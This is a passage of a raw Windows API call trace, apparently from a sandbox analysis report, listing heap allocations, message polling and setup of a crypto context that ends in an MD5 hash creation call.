dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0228.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0228.365] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0228.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0228.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0228.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0228.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0228.366] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0228.366] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0228.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0228.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0228.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0228.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0228.367] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.367] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f990 | out: hHeap=0x970000) returned 1 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0228.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0228.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0228.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0228.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0228.367] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0228.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0228.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0228.368] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.368] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0228.368] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9e0 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0228.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0228.369] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0228.369] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0228.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0228.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0228.369] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0228.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0228.370] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0228.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0228.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0228.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0228.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d78 [0228.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0228.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.371] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0228.371] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0228.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0228.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0228.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0228.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0228.373] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0228.373] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0228.373] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0228.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0228.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0228.374] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0228.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0228.374] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.374] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0228.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0228.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0228.374] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0228.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.374] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0228.375] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0228.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0228.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0228.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0228.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0228.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.375] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0228.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0228.375] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0228.376] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0228.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0228.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0228.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0228.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0228.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0228.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0228.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e512e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0228.440] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0228.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0228.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0228.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 